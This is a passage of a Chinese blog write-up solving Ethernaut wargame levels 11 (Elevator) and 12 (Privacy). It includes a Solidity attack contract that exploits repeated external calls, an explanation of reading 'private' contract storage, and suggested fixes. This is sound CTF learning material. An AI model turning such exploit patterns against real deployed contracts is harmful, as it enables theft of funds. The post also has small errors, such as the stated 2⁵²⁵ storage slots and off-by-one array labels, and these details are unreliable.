

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/III.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Zer0">
  <meta name="keywords" content="">
  
    <meta name="description" content="Ethernaut-刷题小记（六）第11关1234567891011121314151617181920&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;interface Building &#123;    function isLastFloor(uint256) external returns (bool);&#125;contr">
<meta property="og:type" content="article">
<meta property="og:title" content="Ethernaut-刷题小记（六）">
<meta property="og:url" content="https://eznp.github.io/2025/05/08/Ethernaut-%E5%88%B7%E9%A2%98%E5%B0%8F%E8%AE%B0%EF%BC%88%E5%85%AD%EF%BC%89/index.html">
<meta property="og:site_name" content="Zer0">
<meta property="og:description" content="Ethernaut-刷题小记（六）第11关1234567891011121314151617181920&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;interface Building &#123;    function isLastFloor(uint256) external returns (bool);&#125;contr">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504231453446.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504231511946.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504232105958.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504232228744.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504241643460.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504241825246.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242145865.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242231639.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242231854.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242334524.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242338351.png">
<meta property="og:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242338719.png">
<meta property="article:published_time" content="2025-05-08T03:07:15.000Z">
<meta property="article:modified_time" content="2025-05-08T03:08:37.797Z">
<meta property="article:author" content="Zer0">
<meta property="article:tag" content="blockchain solidity">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504231453446.png">
  
  
  
  <title>Ethernaut-刷题小记（六） - Zer0</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"eznp.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"><link rel="alternate" href="/atom.xml" title="Zer0" type="application/atom+xml">
</head>


<body><!-- hexo injector body_begin start --><div id="web_bg"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Zer0</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/P.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Ethernaut-刷题小记（六）"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-05-08 11:07" pubdate>
          2025年5月8日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          42 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Ethernaut-刷题小记（六）</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Ethernaut-刷题小记（六）"><a href="#Ethernaut-刷题小记（六）" class="headerlink" title="Ethernaut-刷题小记（六）"></a>Ethernaut-刷题小记（六）</h1><h2 id="第11关"><a href="#第11关" class="headerlink" title="第11关"></a>第11关</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>interface Building <span class="hljs-punctuation">&#123;</span><br>    function isLastFloor(uint256) external returns (bool);<br><span class="hljs-punctuation">&#125;</span><br><br>contract Elevator <span class="hljs-punctuation">&#123;</span><br>    bool public top;<br>    uint256 public floor;<br><br>    function goTo(uint256 _floor) public <span class="hljs-punctuation">&#123;</span><br>        Building building = Building(msg.sender);<br><br>        if (!building.isLastFloor(_floor)) <span class="hljs-punctuation">&#123;</span><br>            floor = _floor;<br>            top = building.isLastFloor(floor);<br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>分析代码，该合约实现了一个接口，定义了一个函数<code>isLastFloor</code>，接口中的函数没有实现，仅定义了其签名。<code>isLastFloor</code>接受一个<code>uint256</code>参数，用来表示某一层是否是最后一层。</p>
<p>合约分析</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs json">contract Elevator <span class="hljs-punctuation">&#123;</span><br>    bool public top; <span class="hljs-comment">//定义一个布尔变量，表示是否到达顶部</span><br>    uint256 public floor; <span class="hljs-comment">//表示当前楼层</span><br><br>    <span class="hljs-comment">//传入要去的楼层_floor</span><br>    function goTo(uint256 _floor) public <span class="hljs-punctuation">&#123;</span><br>        <br>        <span class="hljs-comment">//把调用合约的地址（msg.sender）转换为 Building 接口类型。也就是说，这里期望 msg.sender 是一个实现了 Building 接口的合约。这里是攻击者攻击的入口点。</span><br>        Building building = Building(msg.sender);<br><br>		<span class="hljs-comment">//判断是不是最后一层</span><br>        if (!building.isLastFloor(_floor)) <span class="hljs-punctuation">&#123;</span><br>            floor = _floor; <span class="hljs-comment">//设置成当前楼层</span><br>            top = building.isLastFloor(floor); <span class="hljs-comment">//再次调用isLastFloor确认是否是顶部，并更新状态变量top，这里也是此关漏洞的关键点之一。</span><br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>这关是一个典型的<strong>多次外部调用引发逻辑不一致</strong>问题</p>
<p>什么是<strong>多次外部调用引发逻辑不一致</strong>，就是一个合约（比如 <code>Elevator</code>）在一次执行过程中，<strong>多次调用另一个合约（通过接口）的方法</strong>，但这两个调用之间的返回值不同，从而导致主合约的内部状态逻辑出现“伪”一致问题。</p>
<p>拿这个题写一个流程图吧 ，帮助理解</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504231453446.png" srcset="/img/loading.gif" lazyload alt="image-20250423145347187"></p>
<p>然后，思路清晰了，接下来直接写攻击代码</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>interface Elevator <span class="hljs-punctuation">&#123;</span><br>    function goTo(uint256 _floor) external;<br><span class="hljs-punctuation">&#125;</span><br><br>contract Attack <span class="hljs-punctuation">&#123;</span><br>    Elevator public elevator;<br>    bool public frist=<span class="hljs-literal"><span class="hljs-keyword">true</span></span>;<br><br>    constructor(Elevator _elevator) <span class="hljs-punctuation">&#123;</span><br>        elevator = _elevator;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function isLastFloor(uint256 _floor) external returns (bool) <span class="hljs-punctuation">&#123;</span><br>        if(frist)<span class="hljs-punctuation">&#123;</span><br>            frist=<span class="hljs-literal"><span class="hljs-keyword">false</span></span>;<br>            return <span class="hljs-literal"><span class="hljs-keyword">false</span></span>;<br>        <span class="hljs-punctuation">&#125;</span> else <span class="hljs-punctuation">&#123;</span><br>            return <span class="hljs-literal"><span class="hljs-keyword">true</span></span>;<br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br><br>    function attack() public <span class="hljs-punctuation">&#123;</span><br>        elevator.goTo(<span class="hljs-number">2</span>);  <span class="hljs-comment">//这里随便几楼都行</span><br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504231511946.png" srcset="/img/loading.gif" lazyload alt="image-20250423151123041"></p>
<p>攻击成功</p>
<h4 id="多次外部调用引发逻辑不一致可能出现的情况"><a href="#多次外部调用引发逻辑不一致可能出现的情况" class="headerlink" title="多次外部调用引发逻辑不一致可能出现的情况"></a><strong>多次外部调用引发逻辑不一致</strong>可能出现的情况</h4><table>
<thead>
<tr>
<th>场景</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>1. 多次外部调用同一方法</td>
<td>合约逻辑中多次调用外部合约的函数，假设结果一致。</td>
</tr>
<tr>
<td>2. 对 <code>msg.sender</code> 使用接口调用</td>
<td>外部合约由用户控制，可能恶意修改返回值。</td>
</tr>
<tr>
<td>3. 没有缓存外部返回值</td>
<td>不缓存第一次返回的值，直接再次调用导致逻辑偏差。</td>
</tr>
<tr>
<td>4. 状态依赖调用顺序</td>
<td>状态变量随外部返回值修改，后续调用依赖前一次结果。</td>
</tr>
</tbody></table>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h4><table>
<thead>
<tr>
<th>方法</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>缓存第一次返回值</td>
<td>把第一次调用的结果存储在本地变量中，后续使用缓存。</td>
</tr>
<tr>
<td>限制外部调用次数</td>
<td>避免一个逻辑流程中对外合约调用多次。</td>
</tr>
<tr>
<td>检查接口返回值一致性</td>
<td>多调用时手动检查值是否一致（并 revert）</td>
</tr>
<tr>
<td>使用 trusted source</td>
<td>避免依赖用户传入的地址做接口调用。</td>
</tr>
</tbody></table>
<h2 id="第12关"><a href="#第12关" class="headerlink" title="第12关"></a>第12关</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Privacy <span class="hljs-punctuation">&#123;</span><br>    bool public locked = <span class="hljs-literal"><span class="hljs-keyword">true</span></span>;<br>    uint256 public ID = block.timestamp;<br>    uint8 private flattening = <span class="hljs-number">10</span>;<br>    uint8 private denomination = <span class="hljs-number">255</span>;<br>    uint16 private awkwardness = uint16(block.timestamp);<br>    bytes32<span class="hljs-punctuation">[</span><span class="hljs-number">3</span><span class="hljs-punctuation">]</span> private data;<br><br>    constructor(bytes32<span class="hljs-punctuation">[</span><span class="hljs-number">3</span><span class="hljs-punctuation">]</span> memory _data) <span class="hljs-punctuation">&#123;</span><br>        data = _data;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function unlock(bytes16 _key) public <span class="hljs-punctuation">&#123;</span><br>        require(_key == bytes16(data<span class="hljs-punctuation">[</span><span class="hljs-number">2</span><span class="hljs-punctuation">]</span>));<br>        locked = <span class="hljs-literal"><span class="hljs-keyword">false</span></span>;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    <span class="hljs-comment">/*</span><br><span class="hljs-comment">    A bunch of super advanced solidity algorithms...</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">      ,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`</span><br><span class="hljs-comment">      .,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,</span><br><span class="hljs-comment">      *.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^         ,---/V\</span><br><span class="hljs-comment">      `*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.    ~|__(o.o)</span><br><span class="hljs-comment">      ^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;^`*.,*&#x27;  UU  UU</span><br><span class="hljs-comment">    */</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>分析代码</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs angelscript"><span class="hljs-built_in">bool</span> <span class="hljs-keyword">public</span> locked = <span class="hljs-literal">true</span>;  <br>   <span class="hljs-built_in">uint</span>256 <span class="hljs-keyword">public</span> ID = block.timestamp;<br>   <span class="hljs-built_in">uint8</span> <span class="hljs-keyword">private</span> flattening = <span class="hljs-number">10</span>;<br>   <span class="hljs-built_in">uint8</span> <span class="hljs-keyword">private</span> denomination = <span class="hljs-number">255</span>;<br>   <span class="hljs-built_in">uint16</span> <span class="hljs-keyword">private</span> awkwardness = <span class="hljs-built_in">uint16</span>(block.timestamp);<br>   bytes32[<span class="hljs-number">3</span>] <span class="hljs-keyword">private</span> data;<br></code></pre></td></tr></table></figure>

<p>定义了一堆状态变量，不过与我们通关有关的就只是data了，但是data是私有的，那就又涉及到了区块链的变量存储的结构了，在第8关中有提到过，不是很详细，这回又遇到了，解释的详细一点吧，这边讲状态变量存储和动态变量存储，建议阅读<a target="_blank" rel="noopener" href="https://docs.alchemy.com/docs/smart-contract-storage-layout">What is Smart Contract Storage Layout? (alchemy.com)</a></p>
<p><strong>Storage 是一个 2⁵²⁵ 个槽位的“键值映射表”，每个槽位是 32 字节。</strong></p>
<p>合约中所有的 <code>state</code> 变量（比如 <code>bool</code>, <code>uint</code>, <code>mapping</code>, <code>array</code> 等）都会被按顺序或规则映射到这些槽位中。 </p>
<blockquote>
<h2 id="How-are-state-variables-padded-and-packed-in-smart-contract-storage-slots-状态变量如何填充和打包到智能合约存储槽中？"><a href="#How-are-state-variables-padded-and-packed-in-smart-contract-storage-slots-状态变量如何填充和打包到智能合约存储槽中？" class="headerlink" title="How are state variables padded and packed in smart contract storage slots? 状态变量如何填充和打包到智能合约存储槽中？"></a>How are state variables padded and packed in smart contract storage slots? 状态变量如何填充和打包到智能合约存储槽中？</h2><p><strong>To store variables that require less than 32 bytes of memory in storage, the EVM will pad the values with 0s until all 32 bytes of the slot are used and then store the padded value.<br>为了存储需要少于 32 字节内存的变量，EVM 将用 0 填充值，直到插槽的所有 32 字节都用完，然后存储填充的值。</strong></p>
</blockquote>
<p>拿个合约做个调试</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504232105958.png" srcset="/img/loading.gif" lazyload alt="image-20250423210503752"></p>
<p>可以看到a和b被分到了同一个槽内，因为a和b都只占了1byte，但是c直接占满了，所以c就是单独在一个新槽里。</p>
<blockquote>
<h2 id="动态大小的状态变量如何存储在智能合约内存中？"><a href="#动态大小的状态变量如何存储在智能合约内存中？" class="headerlink" title="动态大小的状态变量如何存储在智能合约内存中？"></a>动态大小的状态变量如何存储在智能合约内存中？</h2><p><strong>动态大小的状态变量的分配槽方式与静态大小的状态变量相同，但分配给动态状态变量的槽只是标记槽。</strong> 也就是说，槽标记存在动态数组或映射的事实，但槽不存储变量的数据。</p>
<p>对于<a target="_blank" rel="noopener" href="https://www.alchemy.com/overviews/solidity-arrays">动态大小的变量</a>，为什么其数据不直接存储在其分配的槽中，就像它对静态大小的变量的工作方式一样？</p>
<p>因为如果向变量添加新项目，它将需要更多的 slot 来存储其数据，这意味着后续的 state 变量将不得不被下推到更多的 slots。</p>
<p>通过使用标记槽的 <strong>keccak256 哈希</strong>值，我们可以利用巨大的虚拟存储区域来存储变量，而不会有动态大小的变量增长并与其他状态变量重叠的风险。</p>
<p>对于动态大小的数组，标记槽还存储数组的长度。标记槽号的 keccak256 哈希值是一个 “指针” ，指向数组值在合约存储布局中的位置。</p>
</blockquote>
<p>但是Remix 自带 Debugger 看不到这些哈希槽，但可以通过「Storage」手动查槽，<del>懒得查了</del></p>
<p>而这个挑战是固定长度数组<code>bytes32[3]</code>，一个就是32个byte，那就是一个就占一个槽</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">占一个槽	<span class="hljs-built_in">bool</span> <span class="hljs-keyword">public</span> locked = <span class="hljs-literal">true</span>;  <br>正好<span class="hljs-number">32</span>位占一个槽    <span class="hljs-built_in">uint</span>256 <span class="hljs-keyword">public</span> ID = block.timestamp;<br>    <span class="hljs-built_in">uint8</span> <span class="hljs-keyword">private</span> flattening = <span class="hljs-number">10</span>;<br>    <span class="hljs-built_in">uint8</span> <span class="hljs-keyword">private</span> denomination = <span class="hljs-number">255</span>;<br>    <span class="hljs-built_in">uint16</span> <span class="hljs-keyword">private</span> awkwardness = <span class="hljs-built_in">uint16</span>(block.timestamp);<br>    上面三个一共占一个槽，因为不足<span class="hljs-number">32</span>bytes<br>    bytes32[<span class="hljs-number">3</span>] <span class="hljs-keyword">private</span> data; 数组内元素各占一个槽<br>    那就是<br>    <span class="hljs-number">0</span> locked<br>    <span class="hljs-number">1</span> ID<br>    <span class="hljs-number">2</span> flattening,denomination,awkwardness<br>    <span class="hljs-number">3</span> bytes32[<span class="hljs-number">1</span>]<br>    <span class="hljs-number">4</span> bytes32[<span class="hljs-number">2</span>]<br>    <span class="hljs-number">5</span> bytes32[<span class="hljs-number">3</span>]<br></code></pre></td></tr></table></figure>

<p>那么当前Storage的存储就是下面这个情况了</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>	<span class="hljs-attr">&quot;0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000000&quot;</span><span class="hljs-punctuation">,</span><br>		<span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000001&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000001&quot;</span><span class="hljs-punctuation">,</span><br>		<span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x000000000000000000000000000000000000000000000000000000006808f7f5&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ace&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000002&quot;</span><span class="hljs-punctuation">,</span><br>		<span 